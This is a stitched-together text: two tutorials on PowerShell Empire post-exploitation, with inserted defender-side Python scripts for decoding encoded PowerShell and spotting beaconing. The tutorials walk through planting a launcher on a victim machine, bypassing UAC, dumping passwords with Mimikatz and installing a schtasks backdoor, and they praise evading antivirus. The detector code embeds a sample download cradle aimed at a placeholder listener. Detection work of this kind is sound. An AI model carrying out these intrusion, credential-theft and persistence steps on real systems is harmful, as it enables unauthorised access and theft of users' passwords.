Post-Exploitation with PowerShell Empire 2.0

July 19, 2017, by Gus Khawaja

Empire PowerShell

Hi, this is Gus and welcome to this exciting tutorial about the new Empire version 2.0.

I'm pretty sure you're curious and want to learn how to use it. In this lesson, I will walk you through it and show you the tricks you need to achieve your goals as a member of a red team or as a penetration tester.

Here is the workflow I'll be using for this demo:

First, I will show you how to install Empire.

Second, you will learn how to create a listener. If you don't know what a listener is, its name explains what it does: the listener waits for incoming connections from infected victims.

Next, I will show you how to create a PowerShell script with Empire's launcher to send to your victim.

When the victim executes the script, the machine connects back to the listener, and this creates an agent representing the victim machine.

All we need at this stage is to interact with the agent and escalate our privileges so we become some sort of admin. Why? Because with admin privileges I can show you how to run Mimikatz, for example, to extract the victim's passwords.

Finally, I will make sure that you learn how to create a persistent backdoor so you can come back anytime you want.

Before I start this demo, I want to let you know that this blog post also has a video demo on YouTube.

Let's start the action!

 

First, open your browser, go to the Empire GitHub page and click the "Clone or download" button to copy the repository URL to your clipboard.

Now open a terminal window, type git clone and paste the URL:

$ git clone https://github.com/EmpireProject/Empire.git

This will download the application into my home directory (root's home) on Kali Linux.

$ ls

For reference, here is the full sequence of commands used in this demo, in the order they are run ($ is the Kali shell prompt, $> is the Empire console prompt):

$ cd Empire
$ cd setup
$ chmod +x install.sh
$ ./install.sh
$ cd ..
$ chmod +x empire
$ ./empire
$> listeners
$> uselistener http
$> execute
$> launcher powershell http

 

 

Let's explore this new folder.

$ cd Empire

If I check the contents of the Empire directory I can see the setup folder.

$ cd setup

Now I'm pretty sure that our installer is somewhere in here.

$ ls

Here you go, it's the install.sh file.

Let's give it execute permission and run it to install Empire.

$ chmod +x install.sh
$ ./install.sh

The installation is going to take some time, so be patient. After a while, the installer will ask you to enter a password or press Enter to generate a random one. I'm going to press Enter, and we're done!

I will go up one directory to run the empire application, but before doing this I will give it execute permission as well.

$ cd ..
$ ls
$ chmod +x empire

Perfect, it's time to execute this monster.

$ ./empire

Voila! This is the Empire home screen. As you can see, we have 267 modules ready to be used and no listeners or agents, which is normal because it's a fresh copy of Empire.

 

 

Let's start by creating a listener. Type listeners:

$> listeners

And you will get this message:

[!] No listeners currently active

Wait, this is not an error message; check the prompt, it changed to the listeners mode.

Next, I will choose the HTTP-based listener, so type:

$> uselistener http

The prompt changed to the http listener. Alright, it's time to execute it:

$> execute

Amazing! We should have an active listener at this moment.

$> listeners

Here in the details it shows that the name of this listener is http and it's listening on port 80 on my Kali Linux machine.

 

 

 

At this stage we need to create a launcher. Just type launcher on its own in the Empire console and you get a usage message telling you what to supply: the script language and the name of the listener.

Based on this message, let's generate a PowerShell script for the listener named http:

$> launcher powershell http

Perfect, let's copy this PowerShell script so it's ready for our Windows 7 machine.

I will open a new terminal window and use a remote desktop client to connect to the victim machine: -u is for the user name, -p is for the password, followed by the IP address of the Windows 7 host.

Let's open a command prompt in Windows and paste the PowerShell script.

Beautiful! Let's go back to the Empire terminal window, and we have an active agent.

 

 

Type back to go to the main window.

$> back

And here type agents to list the available agents.

$> agents

We can see all the information that represents our Win7 machine, but the name is random, so I will rename it to something more meaningful.

Type rename followed by the first two letters of the current name, then press Tab and Empire will complete it. Then type the desired new name.

$> rename [old name] [new name]

To list the agents at this stage, type list:

$> list

And here you go, our new name for the Windows 7 agent.

Let's interact with this agent:

$> interact [agent name]

And type info to see the necessary information about it:

$> info

 

 

 

Pay attention here: high_integrity is set to 0, because we are not admin. The next step is to elevate our privileges. We can become an admin with a single command, bypassuac, followed by the name of the listener:

$> bypassuac http

Wait a couple of seconds and you should see some text coming your way: we have a new agent.

Press Enter, go back and run the list command to see the new agent.

$> [enter]
$> back
$> list

Check the difference: here we have an asterisk before the username, which means this agent is running elevated. Let's rename this new agent:

$> rename [old name] [new name]

Let's start interacting with this new agent.

$> interact [agent name]
$> info

Pay attention to high_integrity: it's 1 instead of 0.

 

 

 

Perfect, let's run Mimikatz to extract the clear-text passwords. But first, type creds to list the credentials collected so far; it's empty.

$> creds

Next, run mimikatz and wait a few seconds for it to finish executing.

$> mimikatz

Awesome! Let's look at the credential list again, and here you go, all the passwords are extracted for us.

$> creds

It's time for our final stage, the persistent backdoor. If you're ever lost in this application, you can always type the help command to see the available choices:

$> help

 

 

To create a persistent backdoor I will use the schtasks module in Empire.

$> usemodule persistence/elevated/schtasks

Let's check its options. I will set OnLogon to True because I want it to run every time the victim user logs in to this machine, and set the listener name to http.

And finally execute it:

$> info
$> set OnLogon True
$> set Listener http
$> execute

And now we have a persistent backdoor. Success!
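As an added example from the defender's side (it is not part of this post and not Empire's own code), here is the check that covers both the launcher step above and the schtasks persistence step: in both cases the victim runs a one-line powershell command line carrying a base64 -EncodedCommand, first when the script is pasted and again at every logon once the scheduled task exists. The script decodes that argument (base64 of UTF-16LE) from process-creation telemetry and flags the hidden-window, no-profile and download-cradle traits; the command lines and the listener.invalid host are constructed placeholders.

```python
import base64
import re
from typing import List, Optional, Tuple

def _encode_ps(script: str) -> str:
    """Encode a script the way PowerShell's -EncodedCommand expects: base64 of UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

# Constructed sample command lines, as a defender sees them in process-creation
# telemetry (Sysmon Event ID 1 or Security Event ID 4688). The encoded payloads are
# placeholders built inline; listener.invalid is a placeholder host, not a real one.
SAMPLE_COMMAND_LINES = [
    "C:\\Windows\\explorer.exe",
    "powershell -noP -sta -w 1 -enc " + _encode_ps(
        "IEX (New-Object Net.WebClient).DownloadString('http://listener.invalid/stage')"),
    "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
    "powershell -NoProfile -NonInteractive -WindowStyle Hidden -EncodedCommand "
    + _encode_ps("Get-Date"),
]

# PowerShell accepts unambiguous prefixes of its switches; launchers use the short forms.
ENCODED_SWITCH = re.compile(r"^-(e|ec|enc|encodedcommand)$", re.I)
HIDDEN_SWITCH = re.compile(r"^-(w|win|windowstyle)$", re.I)
NOPROFILE_SWITCH = re.compile(r"^-(nop|noprofile)$", re.I)
DOWNLOAD_CRADLE = re.compile(r"(IEX|Invoke-Expression).*(DownloadString|DownloadData)", re.I)

def decode_encoded_command(b64: str) -> str:
    """Turn a -EncodedCommand argument back into readable script text."""
    raw = base64.b64decode(b64 + "=" * (-len(b64) % 4))  # tolerate stripped padding
    return raw.decode("utf-16-le", errors="replace")

def analyze_command_line(cmdline: str) -> Optional[dict]:
    """Return a finding for PowerShell invocations that carry an encoded command, else None."""
    argv = cmdline.split()
    if not argv or "powershell" not in argv[0].lower():
        return None
    finding = {"no_profile": False, "hidden_window": False, "decoded": None, "download_cradle": False}
    for i, arg in enumerate(argv[1:], start=1):
        nxt = argv[i + 1] if i + 1 < len(argv) else ""
        if NOPROFILE_SWITCH.match(arg):
            finding["no_profile"] = True
        elif HIDDEN_SWITCH.match(arg) and nxt.lower() in ("1", "hidden"):  # 1 == Hidden
            finding["hidden_window"] = True
        elif ENCODED_SWITCH.match(arg) and nxt:
            finding["decoded"] = decode_encoded_command(nxt)
    if finding["decoded"] is None:
        return None  # script-file or interactive invocations are out of scope for this check
    finding["download_cradle"] = bool(DOWNLOAD_CRADLE.search(finding["decoded"]))
    return finding

def scan(lines: List[str]) -> List[Tuple[str, dict]]:
    """Run the check over a batch of command lines and keep only the hits."""
    return [(line, f) for line in lines if (f := analyze_command_line(line)) is not None]
```

The decoded text is what you would review or feed to further rules; the third sample (a plain -File run) is deliberately not flagged, which is why this check should sit beside, not replace, a policy on script signing and logging.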

 

Thank you for reading this tutorial. I hope that you liked it, until the next time!

 

 

Getting Started with Post-Exploitation of Windows Hosts

BY KALI NINJA 12/11/2017 5:28 PM

PowerShell Empire is a post-exploitation framework for computers and servers running Microsoft Windows or Windows Server. In these tutorials, we will be exploring everything from how to install PowerShell Empire to how to snoop around a victim's computer without the antivirus software knowing about it. If we are lucky, we might even be able to obtain domain administrator credentials and own the whole network.

A Tool for Targeting Windows

Exploit frameworks are popular, and most hackers have heard of Metasploit, a framework that automates the deployment of powerful exploits. You may be asking yourself, how does PowerShell Empire differ from Metasploit? Isn't Metasploit already serving the same purpose? Well, yes and no. PowerShell Empire deals strictly with Windows machines, and it is extremely useful in a penetration test because most targets these days are running some version of Windows.

 


 

A simple example of this point is the widespread use of Excel on Microsoft Windows. Since the Windows version of Microsoft Excel has more advanced features than the Mac version (as well as Office 365), we can assume that the finance department of most target companies will be using Microsoft Windows. Finance departments also usually have access to bank account numbers and other juicy data!

PowerShell Empire also gives the attacker the ability to run commands in memory. This means that the malicious code PowerShell Empire runs is never written to the hard drive; it runs in the computer's memory instead. This reduces the likelihood of being caught by antivirus software, as well as the likelihood of leaving digital fingerprints for forensic investigators.

When to Use PowerShell Empire

Some of the activities and goals that can be accomplished include privilege escalation (elevating privileges from a standard user account to an administrator), network and host reconnaissance (finding out what hosts and services are present), lateral movement between hosts, and the gathering of credentials. All of these are key components of a modern-day penetration test.

PowerShell Empire accomplishes this via three main components: listeners, stagers, and agents.

A listener is a process which listens for a connection from the machine we are attacking. This is how Empire sends the loot back to the attacker's computer.

A stager is a snippet of code that allows our malicious code to be run via the agent on the compromised host.

An agent is a program that maintains a connection between your computer and the compromised host.

Lastly, modules are where the fun is. These are what execute our malicious commands, which can harvest credentials and escalate our privileges as mentioned above.

Now that we have discussed what PowerShell Empire does and why it is useful, let's take a look at how to get it up and running.

 

 

Step 1: Installing PowerShell Empire

To run PowerShell Empire, you will need a Kali Linux machine. If you need a good starter Kali computer for hacking, you can check out our guide on setting one up on the low-cost Raspberry Pi below.

Learn More: Build a Kali Linux Hacking Computer on the Raspberry Pi

To install Empire on your Kali Linux machine, we need to clone it from GitHub. Open a terminal and type the following command as shown below.

git clone https://github.com/EmpireProject/Empire.git

This will create a new directory with the name "Empire." Move into that directory by typing cd Empire, then use the ls command to view the contents of the directory.

You can read about Empire in the README.md file. You will see a "setup" folder inside the Empire directory. Navigate to that folder by typing cd setup, then use the ls command to view the contents of the "setup" folder. You can see an install shell script as shown below.

Type ./install.sh to install Empire by running the script. The installation will start as shown below.

During the installation process, you will be asked to set up a server negotiation password. I set it to "toor," but you can choose your own password. If everything went well, the installation will finish as shown below.

We are done with the installation. Now, it's time to start Empire.

Step 2: Running PowerShell Empire

Move back to the Empire directory by typing cd .. and run the ./empire executable as shown. It will start as seen below.

If Empire displays any error while starting, navigate to the "setup" folder with cd setup and run the ./reset.sh script. Then restart Empire like we did before. It will display a welcome message as shown below.

Upon completion, Empire will show the following screen.

As of this writing, Empire has 267 modules. Don't worry if these sound like complicated ninjutsu techniques; with diligence and practice you will learn what modules, listeners, and agents are. By the end of this series, you will have a clear idea of what these are and how to use them.

First, let's start by typing the help command. The help command will display the help menu as seen below.

 

Step 3: Using Listeners

Listeners in Empire are the channels which receive connections from our target machine. Before we do anything in Empire, we need to start a listener. We can move to the listener management menu by typing the command listeners as shown below.

Once we move to the listeners management menu, as shown above, we can see its sub-menu by typing the help command. Let's take a look at what each command does.

agents – Will allow you to jump to the agents menu.
back & main – Will take you back to the main menu.
exit – Will exit from Empire.
help – Will display the help menu as shown in the above image.
info – Will display information about the active listener.
kill – Will kill a particular listener.
launcher – Used to generate an initial launcher for a listener.
list – Will list all the active listeners.
usestager – Used to load a stager (we will see below what exactly a stager is).
uselistener – Used to start a listener module.

Let us now look at how to start a listener module in Empire. Type the uselistener command, and use tab completion to see the listeners available in Empire.

The types of listeners available are shown above. We will learn about the different types of listeners in the upcoming sections. For now, let's see how to start a listener.

Let's use the "meterpreter" listener as an example. Type uselistener meterpreter as shown above. Once the particular listener is loaded, you can type the help command to display the available options.

The agents, back, exit, help, launcher, listeners, and main commands have been explained above. Let us learn about the other commands.

The info command shows information about the particular type of listener we want to start, as seen below.

Every listener requires certain options to be set. For example, the "meterpreter" listener needs the Host and Port values to be configured. The set command is used to assign these values. Similarly, the unset command is used to clear these values.

 


 

One important thing to remember is that Empire is case sensitive. For example, in the screenshot below, I am setting the "Name" value of our listener. "Name" and "name" are different in Empire, and it will give you an error if they are used incorrectly, as they cannot be used interchangeably.

When all options are set, we can start the listener using the execute command.

Once we go back to the main menu, we can see that our listener is currently active.

Step 4: Using Stagers

Stagers in Empire are used to set the stage for the post-exploitation activities. They are similar to payloads, and are used to create a connection back to Empire. The stagers can be accessed using the usestager command as shown below.

 


 

Type usestager and then use tab completion to see all the available stagers.

We will learn about different stagers in an upcoming section. First, let's take a look at how to set up a stager.

Let's use the "launcher_bat" stager as an example.

Type the usestager windows/launcher_bat command to load the stager.

Type the help command to have a look at the stager menu.

agents – Will allow you to jump directly to the agents menu.
back & main – Will take you back to the main menu.
exit – Will exit from Empire.
help – Will display the help menu as shown in the above image.
info – Will display information about the active listener.
kill – Is used to kill a particular listener.
execute or generate – Will execute or generate the stager.
interact – Is used to interact with a particular agent (normally used when there are multiple listeners).
list – Will list all the active listeners or agents.
options – Used to see all the options we need to set for the particular agent.
set and unset – Used to set and unset values for particular options, respectively.
listeners – Used to jump to the listeners menu.

We can get more information about this particular stager by using the info command. As you can see in the info output, it creates a self-deleting batch file.

We need to set a listener in order for the stager to be able to communicate with Empire. In the last step, we already created a listener. Let us set this listener for our "launcher_bat" stager.

We can do this using the set Listener meterp command. Type the execute command to generate the stager. The stager is created in the "tmp" folder, as indicated by the output shown above in blue.

Step 5: Using Agents

When we send the stager to our target system and the machine runs it, we get a reverse connection back. This is known as an agent.

The agents menu can be accessed using the agents command as shown below. But, as stated in the red output, we do not currently have any agents registered. That is just around the corner.

The output of the help command is shown above. It displays all the commands we can use once an agent establishes a connection with Empire. For example, typing the list command will show all the active agents we have, as shown below.
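As an added example from the defender's side (not part of this article and not Empire's code), the agent's "connection back" described above is, for an HTTP listener like the one on port 80 in the first tutorial, a stream of ordinary-looking HTTP requests sent on a fixed delay with a little jitter. The script below groups web-server or proxy log lines by source and destination, computes the inter-arrival times, and flags pairs whose intervals are nearly constant; this generalizes beyond Empire to any fixed-delay check-in. The log lines, addresses, paths and delay values are constructed.

```python
from collections import defaultdict
from datetime import datetime, timezone
from statistics import mean, pstdev
from typing import Dict, List

def _log_lines(src: str, dst: str, start: float, gaps: List[float], path: str) -> List[str]:
    """Build constructed log lines: one request at start, then one after each gap (seconds)."""
    lines, t = [], start
    for gap in [0.0] + gaps:
        t += gap
        stamp = datetime.fromtimestamp(t, timezone.utc).isoformat()
        lines.append(f"{stamp} {src} {dst} GET {path}")
    return lines

# Constructed web-server log: one host checking in to the listener on port 80 every
# ~5 s with small jitter (how an agent behaves), and another host browsing normally.
START = 1500458400.0  # arbitrary epoch seconds; only the spacing matters
SAMPLE_LOG = (
    _log_lines("192.168.56.101", "192.168.56.1:80", START,
               [5.0, 5.3, 4.8, 5.1, 4.9, 5.2, 5.0, 4.7], "/index.php")
    + _log_lines("192.168.56.102", "192.168.56.1:80", START + 2.0,
                 [0.2, 12.0, 1.5, 45.0, 3.0, 0.4], "/news.php")
)

def find_beacons(lines: List[str], min_hits: int = 6, max_cv: float = 0.15) -> List[Dict]:
    """Flag (src, dst) pairs whose request intervals are nearly constant.

    cv is the coefficient of variation (stddev / mean) of the inter-arrival times:
    a fixed check-in delay with light jitter gives a small cv; human browsing does not.
    """
    by_pair: Dict[tuple, List[float]] = defaultdict(list)
    for line in lines:
        stamp, src, dst, _method, _path = line.split()
        by_pair[(src, dst)].append(datetime.fromisoformat(stamp).timestamp())
    findings = []
    for (src, dst), times in by_pair.items():
        if len(times) < min_hits:
            continue  # too few requests to judge regularity
        times.sort()
        gaps = [b - a for a, b in zip(times, times[1:])]
        avg = mean(gaps)
        cv = pstdev(gaps) / avg if avg > 0 else 0.0
        if cv <= max_cv:
            findings.append({"src": src, "dst": dst, "hits": len(times),
                             "mean_gap_s": round(avg, 2), "cv": round(cv, 3)})
    return findings

if __name__ == "__main__":
    for finding in find_beacons(SAMPLE_LOG):
        print(finding)
```

Tune min_hits and max_cv to your environment: a larger jitter setting on the agent raises the cv, so the threshold trades missed beacons against false alarms from polling software.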

 

 

Step 6: Using Modules

Modules in Empire are used to perform specific functions. We can access modules using the usemodule command. Type usemodule followed by a space and then use tab completion to see all the modules.

We will learn more about the different modules in a later tutorial. First, let's take a look at how to use modules in Empire. Let's use "external/generate_agent" as an example. Type usemodule external/generate_agent to load the module. Once the required module is loaded, type help to see all the commands we can use with the module.

agents – Will allow you to jump directly to the agents menu.
back & main – Will take you back to the main menu.
exit – Will exit from Empire.
help – Will display the help menu as shown in the above image.
info – Will display information about the active listener.
kill – Is used to kill a particular listener.
execute or run – Will execute the selected module.
interact – Is used to interact with a particular agent (normally used when there are multiple listeners).
list – Will list all the active listeners or agents.
options – Is used to see all the options we need to set for the particular agent.
set and unset – Used to set and unset values for particular options.
listeners – Used to jump to the listeners menu.
reload – Will reload the current module.

Type the options command to see the options required for the module.

Set the required options using the set command, and when complete, use the execute command to run the module.

We will get into more detail about Empire in the upcoming sections. These are the first steps in getting Empire up and running, so stay tuned for more! You can leave any questions in the comments below.

 

 

 
